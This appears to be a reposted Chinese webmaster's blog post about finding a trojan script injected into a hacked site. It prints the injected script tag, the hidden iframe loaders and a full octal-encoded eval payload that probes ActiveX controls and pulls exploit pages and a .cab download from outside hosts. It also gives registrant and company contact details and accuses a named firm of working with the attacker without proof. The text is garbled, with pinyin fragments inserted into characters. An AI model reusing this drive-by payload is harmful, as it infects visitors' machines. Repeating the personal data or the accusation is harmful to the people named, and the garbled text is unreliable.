有一個站被掛馬很長時間了，前臺頁面的馬被清掉，但后臺的馬一直找不到，實(shí)在不舒服，準(zhǔn)備將這個站自殺掉，但又不甘心，決定再找一次。
花了四個多小時，終于找到了，現(xiàn)貼出來提醒大家注意，大家一定不要點(diǎn)馬所在的網(wǎng)址，除非你安裝了殺毒軟件，光一個360是不行的。
先看這一段代碼：
<html xmlns="http://www.w3.org/1999/xhtml">
<script language='JavaScript' type='text/JavaScript' src='http://www.w3og.cn/org'></script>
<head>
注意其中的'http://www.w3og.cn/org',這是木馬網(wǎng)頁地址。很有欺騙性，我找過很多次都沒注意到。服務(wù)器好象是四川樂山電信的，我?guī)缀跻梦易约旱姆?wù)器與之同歸于盡。
再強(qiáng)調(diào)一下，貼出來不是要害你啊，不要亂點(diǎn)。
Domain Name: w3og.cn
ROID: 20080213s10001s70391079-cn
Domain Status: ok
Registrant Organization: 陳強(qiáng)
Registrant Name: 陳強(qiáng)
Administrative Email: zhuya22@126.com
Sponsoring Registrar: 北京新網(wǎng)數(shù)碼信息技術(shù)有限公司
Name Server:ns2.xinnet.cn
Name Server:ns2.xinnetdns.com
Registration Date: 2008-02-13 17:16
Expiration Date: 2011-02-13 17:16



http://www.zjedu.gov.cn/TzemailA ... 277010f71e2c65c0027
電子郵件： zhuya22@126.com
聯(lián)系電話： 0577658796549
聯(lián)系地址： 電風(fēng)扇士大夫
提交時間： 2006-12-11
主題： 這樣的設(shè)施也能辦大學(xué)？？？
建議內(nèi)容： 溫職院INTERNET網(wǎng)硬件設(shè)施太差 每棟宿舍樓網(wǎng)速一直以來比撥號
上網(wǎng)還慢 ，根本不能滿足大學(xué)生對TNTER網(wǎng)的需求
交了30元/月的網(wǎng)費(fèi)卻只能上垃圾網(wǎng)絡(luò)，收了我們的血汗錢卻不干人事，氣人兮
氣人，
學(xué)校機(jī)房既小又差，還1。5元/小時，我靠 這也叫大學(xué)嗎？？我們學(xué)剩
上網(wǎng)只能跑正上的網(wǎng)吧，遠(yuǎn)又網(wǎng)費(fèi)又貴，很多同學(xué)為了省錢只能玩通宵
溫職院的網(wǎng)絡(luò)設(shè)施根本不行，不知道評估團(tuán)怎么辦事的
可笑的是學(xué)校還想評全國十大優(yōu)秀高職 丟死人了


請注意這個公司長沙智之星軟件有限公司www.zzstar.cn,這個木馬一直為這個站帶流量，如果是被陷害的，那還情有可原。如果是同掛馬者合作的話，嚴(yán)重鄙視?？偨?jīng)理：廖某某（不貼名字了）
公 司 地 址： 長沙市麓山南路343號(礦山研究院內(nèi))902室
聯(lián) 系 電 話： 0731-2173510 (0)13787116266
郵 政 編 碼： 410012
電 子 郵 箱： zzstar888@126.com zzstar168@163.com
公 司 網(wǎng) 址：www.zzstar.cn www.macrorise.com
業(yè)務(wù)聯(lián)系QQ：7428377165635301

另一個受害者的文章:今天學(xué)生處的人說他們網(wǎng)頁打開就提示有病毒。上去看了一下，果然，打開之后ie有打開其他網(wǎng)頁的動作，瀏覽器很卡，然后跳出一個RealPlayer的窗口，Nod32提示
2008-4-18 16:21:09 HTTP 過濾器 文件 http://user1.33216.net/bak.css Win32/TrojanDownloader.Small.OBJ 特洛伊木馬 連接中斷 - 已隔離 NIC\Administrator 通過應(yīng)用程序訪問 web 時檢測到威脅: C:\Program Files\Maxthon2\Maxthon.exe.

于是開始檢查。
費(fèi)了一番功夫，就不多說了，直接進(jìn)入主題。

打開Ethereal，對tcp 80端口進(jìn)行監(jiān)測，打開Firefox，并清除緩存（如果不清除可能造成不能完全打開）。

完全打開頁面后，關(guān)閉監(jiān)測。進(jìn)行查看。

按照理論來說，應(yīng)該只有本機(jī)與服務(wù)器之間的通信，哪么其他IP地址的通信就很可以了。

果然，看到了61.174.63.178這個IP(www.w3og.cn/org)，使用Ethereal可以看到具體的URL。

使用FF打開這個網(wǎng)頁。
頁面是空白的，查看源代碼內(nèi)容如下：

www.w3og.cn/org/

document.write("<div style='display:none'>")
document.write("<iframe src=http://abc1.315666.net/s22.html></iframe>")
document.write("<iframe src=http://www.zzstar.cn/reg/w3o.htm></iframe>")
document.write("</div>")

順藤摸瓜：
其中
www.zzstar.cb/reg/w30.htm
<script language="javascript" src="http://count48.#/click.aspx?id=485576456&logo=1"></script>

是51yes的一個統(tǒng)計。

http://abc1.315666.net/s22.html
<iframe src="news.html" width=100 height=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.#/1793783.js"></script>

第二個頁面也是統(tǒng)計，第一個頁面就是病毒了。
再次使用FF打開，查看源代碼：

<script>window.onerror=function(){return true;}</script>
<script>
window.defaultStatus="完成";
eval("\164\162\171\173\166\141\162\40\145\73\15\12\166\141\162\40\141\144\157\75\50\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\105\154\145\155\145\156\164\50\42\157\142\152\145\143\164\42\51\51\73\15\12\166\141\162\40\153\141\166\75\42\134\170\64\142\134\170\66\71\134\170\66\145\134\170\66\67\134\170\67\63\134\170\66\146\134\170\66\66\134\170\67\64\42\73\15\12\141\144\157\56\163\145\164\101\164\164\162\151\142\165\164\145\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\153\141\166\75\42\134\170\64\142\134\170\66\71\134\170\66\145\134\170\66\67\134\170\67\63\134\170\66\146\134\170\66\66\134\170\67\64\42\73\15\12\166\141\162\40\141\163\75\141\144\157\56\143\162\145\141\164\145\157\142\152\145\143\164\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\175\15\12\143\141\164\143\150\50\145\51\173\175\73\15\12\146\151\156\141\154\154\171\173\15\12\151\146\50\145\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\163\143\162\151\160\164\40\163\162\143\75\150\164\164\160\72\134\57\134\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\134\57\155\163\60\66\60\61\64\56\152\163\76\74\134\57\163\143\162\151\160\164\76\42\51\175\15\12\145\154\163\145\173\15\12\164\162\171\173\40\166\141\162\40\146\73\15\12\166\141\162\40\164\150\165\156\144\145\162\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\104\120\103\154\151\145\156\164\56\126\157\144\42\51\73\175\15\12\143\141\164\143\150\50\146\51\173\175\73\15\12\146\151\156\141\154\154\171\173\40\151\146\50\146\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\124\150\165\156\144\145\162\56\150\164\155\154\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\147\73\15\12\166\141\162\40\147\154\167\157\162\154\144\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\107\114\103\110\101\124\56\107\114\103\150\141\164\103\164\162\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\147\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\147\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\107\114\127\117\122\114\104\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\150\73\15\12\166\141\162\40\163\164\157\162\155\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\115\120\123\56\123\164\157\162\155\120\154\141\171\145\162\56\61\42\51\73\175\15\12\143\141\164\143\150\50\150\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\150\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\123\164\157\162\155\111\111\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\151\73\15\12\166\141\162\40\162\145\141\154\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\111\105\122\120\103\164\154\56\111\105\122\120\103\164\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\151\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\151\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\122\145\141\154\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\163\103\162\111\160\124\40\114\101\156\107\165\101\147\105\75\42\152\101\166\101\163\103\162\111\160\124\42\40\163\162\143\75\150\164\164\160\72\134\57\134\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\134\57\162\145\141\154\56\152\163\76\74\134\57\163\143\162\151\160\164\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\152\73\15\12\166\141\162\40\102\141\151\144\165\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\102\141\151\144\165\102\141\162\56\124\157\157\154\42\51\73\175\15\12\143\141\164\143\150\50\152\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\152\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\102\141\151\144\165\133\42\134\170\64\64\134\170\66\143\134\170\66\146\134\170\66\61\134\170\66\64\134\170\64\64\134\170\65\63\42\135\50\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\102\141\151\144\165\56\143\141\142\42\54\40\42\134\170\64\62\134\170\66\61\134\170\66\71\134\170\66\64\134\170\67\65\134\170\62\145\134\170\66\65\134\170\67\70\134\170\66\65\42\54\40\60\51\175\175\15\12\151\146\50\146\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\147\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\150\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\151\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\152\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\15\12\173\154\157\143\141\164\151\157\156\56\162\145\160\154\141\143\145\50\42\141\142\157\165\164\72\142\154\141\156\153\42\51\73\175\175\175")
/*Extreme*/
</script>

很顯然，這個就是病毒源代碼了。加密了而且，不管他了。
另外注意到，
http://www.#/report/0_help.asp?id=1793783&err=4&help=2
可以看到統(tǒng)計名稱。不就是為了一點(diǎn)流量，做這些犯罪的事情，何必呢？



1、使用FF Ethereal。FF不會被這些漏洞利用，而IE基本是一打開就死了。
2、上傳的漏洞位于\xgc\AD\200804\1.js，應(yīng)該是用的動易的漏洞上傳的。
3、搜索w3og.cn，基本搜索到的網(wǎng)頁，google都會提示是惡意網(wǎng)站...

擁有這個W3og.cn的人的注冊信息：
Domain Name: w3og.cn ROID: 20080213s10001s70391079-cn Domain Status: ok Registrant Organization: 陳強(qiáng) Registrant Name: 陳強(qiáng) Administrative Email: zhuya22@126.com Sponsoring Registrar: 北京新網(wǎng)數(shù)碼信息技術(shù)有限公司 Name Server:ns2.xinnet.cn Name Server:ns2.xinnetdns.com Registration Date: 2008-02-13 17:16 Expiration Date: 2011-02-13 17:16

這個w3og.cn和zzstar(一家建站公司)顯然是有關(guān)系的，要不然也不會再木馬里面掛上zzstar的流量統(tǒng)計...

海外服務(wù)器租用

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。